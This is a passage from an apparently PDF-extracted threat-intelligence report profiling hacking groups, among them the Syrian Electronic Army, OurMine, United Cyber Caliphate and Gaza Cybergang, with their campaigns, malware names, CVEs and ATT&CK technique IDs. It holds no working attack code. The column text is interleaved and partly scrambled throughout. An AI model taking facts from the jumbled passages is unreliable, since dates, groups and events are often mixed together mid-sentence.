sent over 40 emails containing three globe, often using shared infrastructure with Jul-2017
unique files, two RTFs and a Microsoft their targeted attack operations. During Phishing campaign
targeting a US-
Excel file. The RTF files exploited CVE- the campaign the group sent phishing based government
organization.
2012-0158 and used as downloaders emails containing malicious Microsoft
to deliver the QuasarRAT malware family. Word documents exploiting vulnerability
Feb-2018
In addition, the RTFs used obfuscation in Microsoft Office. The payload was 2018 Phishing campaign
within the documents themselves, making delivered via bitly, an URL shortener. The against the
United Kingdom,
it more difficult to extract the embedded attack process used bitly as part of the Spain, Russia,
shellcode. The Excel file contained malicious dropping process when communicating Switzerland and
the United States
macros that eventually drops and executes with the command server.
Crimson Downloader. The QuasarRAT was March 2019 - Aggah Campaign
downloaded from a host named subaat[.]
In March 2019, phishing emails were sent
com. Later, security researchers found out
to education, media/marketing, medical,
Subaat was possibly part of a larger crew
technology, and government organizations in
of individuals responsible for carrying 2019
the Middle East, United States, Europe and
out targeted attacks against worldwide
Asia. During the campaign, the attackers
governmental organizations. This larger Mar-2019
sent Word documents that attempted to
crew is named Gorgon Group. Aggah campaign
load a remote OLE document via Template
February 2018 - Phishing campaign Injection. The OLE document contains
against the United Kingdom, Spain, macro which obtains a script that uses
Russia, Switzerland and the United multiple Pastebin pastes to download
States additional scripts, that finally download
RevengeRAT. Of note, it is uncertain if
In February 2018, Gorgon Group started
this campaign indeed associated with the 2020
a campaign of cyber-attacks against
Gorgon Group.
governmental organizations in the United

one identified
N Bitly
Publicly available tools PowerShell
Crimson - remote-access Trojan QuasarRAT - a . Exploited vulnerabilities
Lokibot RemcosRAT CVE-2017-0199
NanocoreRAT RevengeRAT CVE-2012-0158
NjRat

Targeted
Countries _
Russia
Spain
Switzerland
United Kingdom
United States
Pakistan

T1193 - Spearphishing Attachment T1055 - Process Injection T1105 - Remote File Copy
T1059 - Command-Line Interface T1055 - Process Injection T1056 - Input Capture
T1064 - Scripting T1064 - Scripting T1113 - Screen Capture
T1086 - PowerShell T1089 - Disabling Security Tools T1119 - Automated Collection
T1106 - Execution through API T1093 - Process Hollowing Command and Control
T1204 - User Execution T1112 - Modify Registry T1065 - Uncommonly Used Port
Persistence T1140 - Deobfuscate/Decode Files or T1105 - Remote File Copy
Information
125
Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Coercion
ATK 196 Cyber Criminal Communication Dominance
Syrian Electronic Army Defense Ideology
Cyber Terrorist Notoriety
SEA Government Agencies Organizational-gain
Syria Malware Team Hacktivist Revenge
High-Tech
TAG-CT2 State Sponsored Unpredictable
47 Media
Unknown Military
Political Organizations Language
Retail English, Arabic
DESCRIPTION
The Syrian Electronic Army is a hacking just against the official websites of the holes. All of this indicates on the high
group active since the beginning of the media outlets, but also against their social professional level of its members and their
Syrian Civil War in 2011. The group media accounts and even their registrar. capabilities. Their attacks were occasionally
supports the current regime of Bashar Al- In addition, the group is known to use launched by affiliated groups and hackers
Assad, and according to several reports, different types of malware, usually against of the SEA, such as Syrian Malware team,
it is actually part of it. In the hight of the groups and individuals that oppose Al- who share infrastructure and personnel
civil war, the group launched many cyber- Assad’s regime. These malwares are of with the SEA. Of note, in recent years,
attacks, usually against online platforms of various types and usually have advanced cyber-attacks affiliated with the group have
media outlets, in order to deface them and capabilities. In addition, they usually used become more and more rare.
spread their pro-Syrian regime agenda. spear-phishing as their attack vector, but
The attacks and defacements were not also other techniques such as watering

Custom tools None Identified None Identified
SilverHawk
[PHP] SyRiAn Electronic Army
Webshell
Daleth RAT.
FoxSploit Firefox Addon Exploit
Builder
BlackWorm
None Identified

Targeted
Countries _
Canada
France
United Kingdom
United States
Syria
CAMPAIGNS
July 2013 - Tango and Viber attack April 2014 - Reuters attack July 2015 - US Army website hack
The VOIP apps Tango and Viber were The homepage of the website of Reuters The group hacked the US army website,
hacked by the group, and technical and was defaced by the SEA. In this campaign and displayed a pop-up message to all
customer data was stolen. They were able they targeted a third-party service, Taboola, the visitors of the website saying: “Your
to steal the server directory and app log, which uploads its code into Reuters’ website. commanders admit they are training the
alongside user content. It is unclear how Taboola was hacked, but people they have sent you to die fighting.”
it is believed it was done through phishing
End of 2013 - 2015 - Phishing attacks attacks, as in other attacks of the group. August 2015 - Washington Post hack
against the Syrian opposition By hacking Taboola’s widget, the visitors to The campaign started when spear-phishing
The group compromised email accounts of Reuters’ website were redirected to another emails were sent to the Washington post
Syrian personnel active in Syrian opposition website controlled by the SEA calling to journalists, until one of the sports writers
groups, who lived outside of Syria. At first, stop spreading fake news about the Syria was enticed to provide its password to
an email account of a member of one of and calling the British government to stop his email. Through this account, the
the organizations was hacked to gain a supporting the “terrorists”. group sent additional phishing emails,
foothold in the system. In order to receive most probably containing malware to
the account information, different attack July 2014 - BlackWorm campaign other employees. After gaining access
vectors were used such as BruteForce The Syrian Malware Team which is highly to the website, they were able to redirect
and spear-phishing. Following this, the affiliated with the Syrian Electronic Army, readers of the website to the SEA website
attacker downloaded all the data saved used the BlackWorm malware against and take over Twitter accounts of some
on the compromised account such as different victims, who were not disclosed. of the journalists to spread pro-Syrian
old messages, address book and more. slogans. The paper also claimed that the
November 2014 - British and attack was done by hacking Outbrain, a
At the last stage, the attackers used the
compromised account to launch spear- American media outlets attacks third-party service they use for content
phishing attacks against users from the The SEA hacked a few American and British recommendation.
same organization. news outlets such as Daily Telegraph, the
Canadian Broadcasting Corporation 2016 - 2018 - Silverhwak campaign
February2014-ChangingFacebook’s and New York Daily News, and retail The group used fake updates for messaging
WHOIS information companies such as Walmart Canada, in apps to spread the Silverhwak malware
The group hacked the administrator which it defaced their websites. against different victims.
account of MarkMonitor, the registrar of
January 2015 - Le Monde hack December 2017 - Attack against
Facebook. Following this, they changed
The group took over the Twitter account the Syrian opposition websites and
the contact information in Facebook’s
WHOIS records to be those of the SEA. of the French newspaper Le Monde after social media accounts
They also claimed that they were able to they acquired its credentials through a The group took down websites and social
hijack the domain, but that was denied spear phishing attack. During that time, media pages operated by the Syrian
by Facebook. They claimed they did it as they twitted against the French support opposition. The SEA did it by taking
retaliation for closing Facebook pages of the Syrian opposition. In addition, the control of the websites themselves, or by
connected to the group. newspaper announced that there was an reporting those websites and accounts to
attempt to launch a DDoS attack against its the social media platform.
website to bring it down at the same time.
2013 2014 2015 2016 2017 2018
Jul-2013 Feb-2014 Nov-2014 Jul-2015 2016-2018 Dec-2017

Tango and Viber Changing British and US Army website Silverhwak Attack against the
attack Facebook’s WHOIS American media hack campaign Syrian opposition
information outlets attacks websites and social
media accounts
Aug-2015
End of 2013 Apr-2014 Jan-2015 Washington Post
Phishing attacks Reuters attack Le Monde hack hack
against the Syrian
opposition
Jul-2014
BlackWorm
campaign
127
Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Coercion
ATK 196 Cyber Criminal Communication Dominance
Syrian Electronic Army Defense Ideology
Cyber Terrorist Notoriety
SEA Government Agencies Organizational-gain
Syria Malware Team Hacktivist Revenge
High-Tech
47 TAG-CT2 State Sponsored Unpredictable
Media
Unknown Military
Language
Retail English, Arabic

Targeted
Countries _
Canada
France
United Kingdom
United States
Syria

T1189 - Drive-by Compromise T1088 - Bypass User Account Control T1123 - Audio Capture
T1192 - Spearphishing Link T1100 - Web Shell T1429 - Microphone or Camera Recordings
T1193 - Spearphishing Attachment Defense Evasion (M)
T1476 - Deliver Malicious App via Other T1432 - Access Contact List (M)
Means (M) Command and Control
T1089 - Disabling Security Tools
Execution T1112 - Modify Registry T1094 - Custom Command and Control
T1072 - Third-party Software T1453 - Abuse Accessibility Features (M) Protocol
Persistence Discovery Impact
T1100 - Web Shell T1018 - Remote System Discovery T1489 - Service Stop
T1176 - Browser Extensions T1498 - Network Denial of Service
Lateral Movement
T1021 - Remote Services
T1072 - Third-party Software
129
OurMine Communication Coercion
Cyber Terrorist Dominance
O
urMine High-Tech Personal-gain
(security group) Hacktivist Personal-satisfaction
Media
TAG-HA10 Revenge
State Sponsored
40
Unknown
Language
English
DESCRIPTION
OurMine is a hacking group active since security issues in order to receive money of the threat actor behind the group, a
mid-2016 that has been identified for from the companies in which these issues teen from Saudi Arabia. Another example
being from Saudi Arabia. They are mostly were found. This was also the case with was when they leaked information of a
known for taking over Twitter accounts of the two DDoS attacks they launched company that did not contact them about
high ranked personnel such as CEOs of against HSBC bank and Pokemon Go (in security issues they found in its servers.
large cooperation and more, and Twitter 2016 and 2017 respectively), allegedly Furthermore, in some cases they tried
accounts of organizations themselves. In to enhance the level of security of those to brag in their capabilities when they
most cases they claimed that they took companies. However, even though OurMine were challenged to hack the website of
over the account to show its owner its tried to show themselves as a group that WikiLeaks in 2017. Overall, the group did
low level of security, while requesting enhances cyber security of companies, not launch very sophisticated attacks, and
them to contact the group directly to solve some of their attacks were done as a all the attacks were detected very quickly.
this problem. This shows that the group revenge. For example, they took over a Of note, since mid-2017, the group is
presents itself as a kind of a grey-hat media website after publishing an article not active, and their website seems to be
group who looks for vulnerabilities and that allegedly revealed the real identity under maintenance.

None Identified
None Identified
None Identified

Targeted
Countries _
United Kingdom
United States
Saudi Arabia
CAMPAIGNS
June-2016 - Twitter accounts hack August 2016 - Jimmy Wales Twitter on the main page. They said that they
The group hacked the social media accounts account hack did not change any password and ask
of several high-level personnel in large The Twitter account of Wikipedia founder, the owners of the website to contact them.
cooperation. In their tweets they mostly Jimmy Wales, was hacked by the group The website itself came back to normal
tried to show that they are able to hack the that tweeted that he passed away and that very fast, claimed that the attack was not
account because of low security measures OuneMine is a real group. The account very advanced.
and thus to show their capabilities and their was restored shortly after. August 2017 - WikiLeaks Hack
services. The first attack was against Mark
Zuckerberg, the founder and president of October 2016 - BuzzFeed hack The website of WikiLeaks was hacked by
The News website BuzzFeed was hacked OurMine, and its homepage was defaced.
Facebook. In this case, the hackers were
by OurMine as a revenge on an article According to their message, the group
able to gain control for a short while of
BuzzFeed published, which claimed to defaced the website because they were
Zuckerberg’s LinkedIn, Pinterest and Twitter
identify the person behind the group. challenged to do so by Anonymous. They
accounts, and also attempted to attack his
OurMine were able to deface one of also accused Anonymous for publishing
Instagram account, and publish different
the articles on the website main page a fake paste that allegedly included the
posts there. According to them, they were
and claimed that they have the website’s information of all the members of the
able to find the password to the LinkedIn
database that will be leaked if BuzzFeed group. WikiLeaks denied it was hacked,
account from its famous leak from 2012.
will continue to talk about them. and it was found that the group actually
The second was the former Twitter CEO,
used the technique of DNS hijacking to
Dick Costolo, in which they tweeted that
21 December 2016 - NFL, Netflix look as if the website was hacked, while
the account was hacked by OurMine.
and Marvel’s Twitter accounts hack actually they hacked the domain name
The third person hacked by the group
on the same day server.
was Google’s CEO Sundar Pichai. The
Netflix the NFL and Marvel’s characters’
group gained access to his twitter account August 2017 - Game of Thrones
by hacking his Quora account. The fourth Twitter accounts were all hacked by OurMine.
Twitter account hack
person was Uber’s CEO, Travis Kalanick, In all the cases, the same message was
written: “Hey, it’s OurMine, don’t worry we The Twitter account of Game of Thrones
that his twitter account was also hacked was hacked by the group and tweeted
by the group in a similar way. In addition, are just testing your security. Contact us to
help you with your security”. Furthermore, that OurMine did it because they were
they hacked other Twitter accounts of testing the security of its owners.
other known personnel such as novelist in all cases the accounts restored in a
Hank Green, journalist Matthew Yglesias short while. September 2017 - VEVO Data Leak
and more. July 2017 - Pokemon Go DDoS attack Vevo music cooperation was hacked, and
about 3.12TB of internal data were leaked
July 2016 - HSBC bank DDoS attack The group launched a DDoS attack
against the servers of Pokemon Go, which online, allegedly by OurMine. Among
OurMine launched a massive DDoS attack the stolen information were videos and
against the servers of HSBC bank, which prevented from players to log in to the
game. Also, in this case, the group said promotional material, alongside business
affected mainly their domains in the US information. The group claimed that it
and UK. After a few hours, the group that the game will be unavailable until
the company will contact them to solve approached the company before publishing
claimed that it stopped the attack, and the data, but they disregarded them, so
requested that a representative of the their security issues. In a short while the
game started to work again. they leaked the data as retaliation. All the
bank to contact them directly. information was published on the website
July 2017 - TechCrunch Hack of the group.
The group attacked the news website
TechCrunch and changed the message
2016 2017 2018
Jun-2016 Jul-2016 Oct-2016 Jul-2017 Sep-2017

Twitter accounts HSBC bank DDoS BuzzFeed hack • Pokemon Go • VEVO Data Leak
hack attack DDoS attack
•TechCrunch hack
Aug-2016 Dec-2016
Jimmy Wales NFL, Netflix and Aug-2017
Twitter account Marvel’s Twitter
• Wikileaks hack
hack accounts hack on
the same day • Game of Thrones
Twitter account
131
hack
OurMine Communication Coercion
Cyber Terrorist Dominance
O
urMine High-Tech Personal-gain
(security group) Hacktivist Personal-satisfaction
Media
TAG-HA10 Revenge
State Sponsored
40
Unknown
Language
English

Targeted
Countries _
United Kingdom
United States
Saudi Arabia
Initial Access Privilege Escalation Credential Access

T1078 - Valid Accounts T1078 - Valid Accounts T1003 - Credential Dumping
Persistence Defense Evasion Impact
T1078 - Valid Accounts T1078 - Valid Accounts T1491 - Defacement
T1496 - Resource Hijacking
T1498 - Network Denial of Service
133
ATK 133 Cyber Criminal Aviation & Objectives _
United Cyber Caliphate Defense Ideology
Cyber Terrorist
UCC Notoriety
Education Organizational gain
TAG-CT6 Hacktivist
Government Agencies Revenge
State Sponsored Unpredictable
Media
38 Unknown Military
Naval Language
English, Arabic
DESCRIPTION
United Cyber Caliphate (UCC) or Islamic - Cyber Caliphate, or Cyber Caliphate and Twitter. SCA Claimed to have hacked
State Hacking Division is a name of an Army (CCA) was established shortly after 10,000 Facebook accounts, more than
umbrella for several hacking groups the establishment of the Islamic State. The 150 Facebook groups and over 5,000
working for the Islamic State of Iraq and Key person behind the group was Junaid Twitter profiles. - Kalashnikov E-Security
Levant (ISIS or ISIL) terrorist organization. Hussain (Abu Hussain al Britani), or TriCK. Team was established in 2016. This group
The organization emerged in April 2016. The most important cyber-terrorist attack of is focused on tech security advisory for ISIS
Mostly known for its campaign against US the CCA occurred on January 2015 when Jihadists. It also uploaded ISIS-related
military and governmental personal. On the Twitter and YouTube accounts of U.S jihadi literature, sharing posts from cyber
April 4, 2016, the Cyber Caliphate Army Central Command and later on the Twitter jihadi groups, reporting successful attacks
(CCA), the principal ISIS hacking unit, accounts of the magazine Newsweek were on websites and Facebook pages and
and other pro-ISIS groups like the Sons hacked. - The Sons Caliphate Army (SCA) publishing various web-hacking techniques.
Caliphate Army (SCA) and Kalacnikov.TN was established in 2016, as a subgroup Gradually, the hackers started to conduct
(KTN) merged and formed The United Cyber of Cyber Caliphate. Mostly known for or assist in defacing hacks.
Caliphate (UCC). UCC groups include: disrupting social media traffic on Facebook
CAMPAIGNS
Jan-2015
• The Albuquerque
Journal and
Maryland’s
01/2015 - The Albuquerque Journal websites. Further investigations suggest
2015
WBOC Hacking
and Maryland’s WBOC Hacking a Russian group was actually behind the • Malaysia Airlines
Website Attack Feb-2015
CCA - Cyber Caliphate took over the news incident, but this was never confirmed. a Newsweek
magazine Twitter
organization’s Twitter handles and posted warning message was issued in Arabic, account hijacked
several confidential documents including but with a lot of spelling and grammar
mistakes, indicating “the authors are not Sep-2015
driver’s licenses, corrections records and
• TV5Monde
spreadsheets with hundreds of names and Arabic”. French authorities later suspected Attack
addresses. The group also replaced the APT28, a Russian hacking group, of • UK Government
news organization’s Twitter account profile performing the attack. v 2016

Email Hacking
and cover photos with ISIS themed art. 09/2015 - UK Government Email Apr-2016
01/2015 - Malaysia Airlines Website Hacking Australian
Websites Hacking
Attack ISIS intercepted top secret emails of British
CCA - The Malaysia Airlines website was vGovernment in major security breach
compromised by “Lizard Squad”. The uncovered by GCHQ.
website’s front page was replaced with an 04/2016 - Australian Websites
image of a tuxedo-wearing lizard and read 2017
Hacking
“Hacked by LIZARD SQUAD - OFFICIAL Apr-2017
UCC - the United Cyber Caliphate have
CYBER CALIPHATE”. It is debated whether 8K Kill List Release
gone on a website defacement spree,
the website was merely hack or was also
breaking into more than 20 Australian
a victim of DNS spoofing.
small businesses websites.
02/2015 - Newsweek magazine
04/2017 - 8K Kill List Release
Twitter account hijacked
UCC - United Cyber Caliphate released
CCA - the Cyber Caliphate hijacked 2018
a kill list that includes 8,786 names of
Newsweek magazine’s Twitter account
Americans.
and threatened President Obama’s wife
and daughters. 10/2018 - ISIS Launch Cracking
Software
09/2015 - TV5Monde Attack
UCC - Cyber Caliphate Team launch
CCA - Islamic State hackers hacked the Oct-2018
“Multy BruteForce Facebook”, a Facebook-
French television network TV5Monde ISIS Launch
cracking software. Cracking Software
bringing the television broadcasts to a 2019
halt and hijacked its social networks and

Targeted
Countries _
Australia
Egypt
France
Malaysia
United Kingdom
United States
Worldwide
Execution Lateral Movement Impact

T1072 - Third-party Software T1072 - Third-party Software T1491 - Defacement
Credential Access Collection T1499 - Endpoint Denial of Service
T1003 - Credential Dumping T1114 - Email Collection
T1110 - Brute Force

Custom tools Telegram: Messages App None Identified
Multy BruteForce Facebook WhatssApp: Messages App
Caliphate Cannon
Ancalog Exploit Builder: a document
exploitation tool.
None Identified
135
ATK 89 Cyber Criminal Aerospace & Objectives _
D
ESERT FALCONS Defense Ideology
(sub-group) Cyber Terrorist
GAZA CYBERGANG Energy
Hacktivist
GAZA CYBER GANG Financial Services
GAZA HACKERS TEAM State Sponsored Government Agencies
MoleRATs (sub-group)
35 O
PERATION Unknown High-Tech
PARLIAMENT Media Language
(sub-group, named Arabic
after their campaign)
TAG-CT5
Gaza Cybergang is an Arabic politically social engineering methods such as fake January 2012 - Defacement of
motivated APT group, active all over the websites that promise political information Israeli Websites
world, including in Europe and the US, but or spear phishing emails and social
Arabic hackers, calling themselves “Gaza
they are mainly active in the Middle East messaging. * Gaza Cybergang Group
Hackers Team”, hacked Israel Fire and
and North Africa (MENA) and in Palestine in 3: aka Operation Parliament: The group
Rescue services website and posted the
particular. The group is comprised of three is focused on espionage, covering on
message “Death to Israel”.
sub-groups: * Gaza Cybergang Group executive and judicial bodies all over the
1: aka MoleRATs: The group’s aim is to world, and focusing on MENA, particularly October2012-Operation“MoleRATs”
the infection of the victim in a RAT and it Palestine. the group used malware with Israel government websites were attacked,
often makes use of text-sharing platforms, CMD/PowerShell commands for its attacks. officials were temporary cut off the internet.
such as: PasteBin, github.com, upload. Each group is different in TTPs, but they This campaign also targeted Palestinians
cat and more. * Gaza Cybergang Group make use of the same tools after gaining and the governments of the US and UK.
2: aka Desert Falcons: the group makes the initial grip on their victims. Hackers were discovered to be the “Gaza
use of homemade malware, tools and Hackers Team”.
techniques. Victims are often infected by
March 2013 - 2014 - 1st Campaign
The first and main campaign of the Falcon
Desert sub-group, with the highest victims’
number, targeting devices and mobiles.
Targets include Palestine and Gulf states,
TOOLS, MALWARES AND VULNERABILITIES including government organizations, military
centers and top media outlets.
Malwares Legitimate software March 2013 - 2014 - 2nd Campaign
Custom tools None identified The second campaign of the Falcon Desert
F aclons’ Backdoor
Exploited vulnerabilities sub-group was focused mainly on Israel,
F alcons’ Downloader
VE-2017-0199
C while using the main Falcons Trojan. Over
D ustySky (NeD Worm)
600 victims have been identified.
D HS Spyware
D HS2015 / iRat March 2013 - 2014 - 3rd Campaign
M olerat Loader The third campaign of the Falcon Desert
S cote sub-group was focused mainly on politicians
T ajMahal APT Framework and media figures in Egypt. This is the sole
Tools used by multiple adversaries campaign when DHS spyware was used.
P oison Ivy June-July 2013 - Poison Ivy Attacks
C obalt Strike
MoleRATs used PIVY(Poison Ivy) against
D owneks
Middle Eastern and US targets.
Q uasar RAT
n jRAT April 2014 - Attacks on US and
X tremeRAT European targets
Publicly available tools MoleRATs, using XtremeRAT, attacked a US
rowserPasswordDump10: Password
B financial institution and multiple European
dumper government organizations.
Summer 2014 - Attacks against
Israeli and Palestinian Interests
The attackers dropped malware via Decoy
documents and filenames utilized in the
attacks. Further examination of the case

Afghanistan Jordan Saudi Arabia
Algeria Kuwait Serbia
Canada Lebanon Slovenia
China Latvia Somalia
Chile Libya South Korea
Denmark Macedonia Syria
Djibouti Morocco Turkey
Egypt New UAE
Germany Zealand United
India Oman Kingdom
Iran Palestine United
Iraq Qatar States
Israel Russia Yemen
Palestinian National Authority, MENA
Jan-2012
2012
implies the intended targets comprise victims are different than those of Gaza Defacement of
Israeli websites
off organizations with political interests Cybergang’s and Desert Falcons’, since
or influence in Israel and Palestine. TTPs they were more focused on information-
suggest MoleRATs or Palestinian hackers gathering. Their malware provides remote Oct-2012
are behind the attack. CMD/PowerShell terminal for the atttackers, Operation
"MoleRATs"
enabling script/commands execution and
2014 - 2016 - Operation Moonlight results received via HTTP requests.
2013
Mar-2013
Based on the tools and targets, the Gaza Mar-2013
1st campaign
Hacker Team is behind more than 200 February 2019 - Middle East Attack 2nd campaign
Jun-2013
attacks in the past two years. The attacks MoleRATs are suspected of using an Poison Ivy attacks
were against targets in Palestine, Egypt, Office Word document with embedded
US, Jordan, Libya, Iran, Israel, and China. malicious macros that drops and executes 2014
a backdoor packed by Enigma Virtual Box. Apr-2014
September 2015 - Operation The backdoor includes a built-in keyword Attacks on US and
DustySKy list with names of people or opera movies Summer 2014 European targets
MoleRATs have used the DusySKy malware to communicate with C2, distributes control Attacks against
2014-2016
Israeli and
during a campaign in multiple attacks, commands to further control the victim’s Palestinian Operation
interests
which are targeted but not spear-phished, computer device. 2015
Moonlight
meaning they are not tailored specifically

to each and every target. They include April 2019 - “SneakyPastes”
malicious email messages that are delivered Campaign Sep-2015
to selected targets. Targets include Israel, The Gaza Cybergang has initiated a Operation
DustySky
Egypt, Saudi Arabia, United Arab Emirates, multistage campaign that begins with
Iraq, US and different countries in Europe. phishing emails that moves from one-time 2016
addresses and one-time domains. The

September 2016 - Operation emails might include links to malware or
DustySKy part2 infected attachments. If the victim opens Sep-2016
MoleRATs stopped previous attacks in the the attachment (or follows the link), their Operation
Middle East but renewed them after 20 device receives Stage One malware
DustySky part2
days. Hamas is suspected to be behind 2017

programmed to activate the infection 2017 2017
the attacks. chain. Once Stage One malware infects Mobile espionage,
Operation
Macros and
the computer, it tries to secure its position, Parliament
2017 - Mobile Espionage, Macros CVE-2017-0199
conceal its presence from antivirus, and
and CVE-2017-0199
hide the command server. Finally, the
Gaza Cybergang began targeting oil and device is infected with a RAT malware that 2018
gas industry in MENA, infiltrating systems scans it for PDF, DOC, DOCX, and XSLX
and pilfering data. Also, the group abused files to be sent to a C2 server.
CVE-2017-0199 vulnerability and Microsoft
Access files. Traces of mobile malware was April 2019 -TajMahalAPTFramework
also discovered in late 2017. The Gaza Cybergang has utilized TajMahal
that included two malware packages,
2017 - Operation Parliament 2019
Feb-2019
“Tokyo” and “Yokohama”. Tokyo is used
Since early 2017, the group called Operation as a first-stage infection that subsequently
Middle East attack
Parliament have been attacking in the middle deploys Yokohama as a second-stage attack Apr-2019 TajMahal APT
east with sophisticated Cyber capabilities. on victims who are deemed of interest. "SneakyPastes" Framework
campaign
They have been particularly careful to verify
victim devices before proceeding with the 2020
infection, safeguarding their command and
control servers. Operation Parliament’s
137
D
ESERT FALCONS Defense Ideology
(sub-group) Cyber Terrorist
GAZA CYBERGANG Energy
Hacktivist
GAZA CYBER GANG Financial Services
GAZA HACKERS TEAM State Sponsored Government Agencies
MoleRATs (sub-group)
35 O
PERATION Unknown High-Tech
PARLIAMENT Media Language
(sub-group, named Arabic
after their campaign)
TAG-CT5

Afghanistan Jordan Saudi Arabia
Algeria Kuwait Serbia
Canada Lebanon Slovenia
China Latvia Somalia
Chile Libya South Korea
Denmark Macedonia Syria
Djibouti Morocco Turkey
Egypt New UAE
Germany Zealand United
India Oman Kingdom
Iran Palestine United
Iraq Qatar States
Israel Russia Yemen
Palestinian National Authority, MENA

T1091 - Replication Through Removable T1003 - Credential Dumping T1008 - Fallback Channels
Media Discovery Impact
Defense Evasion T1057 - Process Discovery T1491 - Defacement
T1116 - Code Signing Lateral Movement
T1091 - Replication Through Removable
Media
139
ATK 142 Cyber Criminal Communication & Objectives _
PRYZRAKY GROUP Cyber-security Ideology
Cyber Terrorist
TAG-HA11 Defense Personal-satisfaction
Hacktivist
Education Unpredictable
State Sponsored Energy
35 Unknown Financial Services
Government Agencies Language
I nternational Portuguese, English
Organizations
DESCRIPTION
Pryzraky Group is a group of Brazilian 2019. The group’s members are Mecz1nho targets mainly educational, government
hackers, in activity since at least 2018. The (the group’s founder), al1ne3737 (main and law enforcement websites in various
group mainly carries out attacks against attacker), Inocent, F1r3bl00d, ZHacker13 countries. However, it seems that the main
websites, including defacements, DDoS and (an Israeli hacker), D4RKR0N, Poptart, motive of this group is more boredom,
data leaks, and recently began doxxing as Aj44x, xS1lenc3d, Dext3r and LcsCyan. The challenge or to prove a point, rather than
well. The group is mainly known for taking group often tags along to various global real ideology.
down the websites of NASA and the NSA in Anonymous campaigns worldwide and

FuckingBotnet
KLTools
None Identified
None Identified

Algeria France Spain
Argentina Germany Sudan
Bahamas India UAE
Bangladesh Indonesia U
nited
Barbados Israel Kingdom
Brazil Japan U
nited
Cambodia Mexico States
Colombia Nicaragua Venezuela
Costa Rica Peru
E
uropean S
audi
Union Arabia
Brazil
CAMPAIGNS
October 2018 - #OpKhashoggi March 2019 - #OpNicaragua 2018
As part of the global Anonymous campaign #OpNicaragua is a hacktivist campaign 2018-present 2018-present
targeting Saudi Arabia following the death against the government of Nicaragua in #OpIsrael #OpNicaragua
of Jamal Khashoggi, Pryzraky group carried protest against its repression of protest
out attacks against the Saudi University movements in the country. In this campaign,
of Business and Technology, as well as Pryzraky group targeted universities and
two Saudi banks. government-related websites in Nicaragua
and Costa-Rica.
November 2018 - #OpAntiNazism 2018-2019
As part of an anti-nazism cyber campaign March 2019 - #OpCopyWrong Targeting Brazilian
and Argentinian
the group targeted racist groups, including In March 2019, Anonymous launched a Politicians and the
governement and
the KKK website. campaign dubbed #OpCopyWrong, an education sectors
international campaign targeting the EU
December 2018 - #OpIcarus and aimed at lobbying European parliament
A cyber campaign against the financial against passing changes to the copyright
sector around the world that was first laws. As part of this campaign, Pryzraky
launched in February 2016. Since then, group leaked data and carried out other
hacktivists have launched several additional attacks on EU related sites, including the
phases of this campaign over the years. Europol and EU government websites. Oct-2018
The Pryzraky Group participated in the #OpKhashoggi
April 2019 - #OpEcuador / FreeAsange
campaign, carrying out attacks against
Nov-2018
central banks of India, Barbados and In April 2019, the group joined the global
#OpAntiNazism
the Bahamas. FreeAsange campaign, targeting Ecuador
following the extradition of WikiLeaks Nov-2018
January 2019 - NASA Breach establisher Julian Assange to the authorities #OpIcarus
2019 Jan-2019
In January 2019, Pryzraky group claimed in the UK. In this campaign, the group
NASA Breach
responsibility for using a DDoS attack to targeted government-related websites and
take down NASA’s domain. According to domains, including the official website of Feb-Mar-2019
the group’s founder, Mecz1nho, NASA the president of Ecuador and the website #OpSudan
was picked as a target because many see Feb-Apr-2019
of the police of Ecuador. As part of this
#OpVenezuela
their systems as an example. campaign, the group also attacked targets
in the UK, such as the websites of the UK Mar-2019 Mar-2019
February-March 2019 - #OpSudan supreme court and the UK police. #OpNicaragua #OpCopyWrong
In February 14, 2019, the group declared they
have joined #OpSudan - an international April 2019 - #OpIsrael Apr-2019
#OpIsrael
cyber campaign against Omar Al-Bashir’s A pro-Palestinian and anti-Israel cyber
regime in Sudan. In this campaign, the group campaign which occurs annually on April
targeted multiple Sudanese Government- 7 since 2013. In 2019 Pryzraky joined
related domains in defacement, data leaks the campaign and attacked the Israeli
and DDoS attacks. police department of investigations and
intelligence, using the FuckingBotnet with
February-April2019-#OpVenezuela Cloudflare bypass.
In February 26, 2019, the group declared
they have joined #OpVenezuela - an 2018-2019 - Targeting Brazilian
international campaign due to the protests and Argentinian Politicians and the
presented in Venezuela. In this campaign, governement and education sectors
the group mainly carried out defacements, Throughout their activity, Pryzraky group
data leaks and DDoS attacks against attacks Brazilian and Argentinian institutions,
domains of TV stations, universities and mainly in the education and government
government agencies. sectors. The attacks include defacements, 2020
data leaks, DDoS attacks and doxxing of
judges and politicians.
141
PRYZRAKY GROUP Cyber-security Ideology
Cyber Terrorist
TAG-HA11 Defense Personal-satisfaction
Hacktivist
Education Unpredictable
State Sponsored Energy
35 Unknown Financial Services
Government Agencies Language
I nternational Portuguese, English
Organizations

Algeria France Spain
Argentina Germany Sudan
Bahamas India UAE
Bangladesh Indonesia U
nited
Barbados Israel Kingdom
Brazil Japan U
nited
Cambodia Mexico States
Colombia Nicaragua Venezuela
Costa Rica Peru
E
uropean S
audi
Union Arabia
Brazil
Initial Access
T1190 - Exploit Public-Facing Application
Credential Access
Impact
T1489 - Service Stop
T1491 - Defacement
143
Anon Italia Cyber Criminal
Administration & Objectives _
Aviation
Cyber Terrorist Education
TAG-HA2 Financial Services
Hacktivist Food and Agriculture
Government Agencies
Hospitality
International Organizations
35 Unknown Manufacturing
Media Language
Military
Naval Italian
Pharmaceutical
Research
Retail
Transportation Assumed origin of the attacker
DESCRIPTION
Anonymous Italia is one of the oldest always been among their preferred targets. who used the aliases Aken and Otherwise.
hacktivist groups appearing on the Italian Of note, many attacks were apparently Interestingly, the latter contributed to the
cyber-threat landscape, in 2012. The conducted in cooperation with two other development of a “serverless” portal for
group is characterized by an anarchist Italian hacktivist groups, namely LulzSec coordinating the group’s operations, named
ideology, with a strong sense for social ITA, and AntiSecurity ITA, characterized Osiris, demonstrating significant technical
justice, environmental issues. This highly by a similar ideology. Throughout its long capabilities. Of note, the group is also
ideological imprinting translates into a clear activity, the group executed hundreds of actively involved in the promotion of real-
aversion towards Italian political institutions data leaks, defacements and DDoS attacks. world operations, such as #OpGreenRights,
and security forces. In this context, we Notable was the 2015 attack against the #OpPaperStorm, and the Million Mask
identify recurring patterns in the hacktivists’ Ministry of Defense (with thousands of leaked March.
target selection. In fact, police, political records), which also led to the arrest of
parties, and government institutions have two prominent members of the collective,

None Identified
None Identified
None Identified

Targeted
Countries _
Brazil
France
Italy
Initial Access Exfiltration Impact

T1190 - Exploit Public-Facing Application T1002 - Data Compressed T1491 - Defacement
145
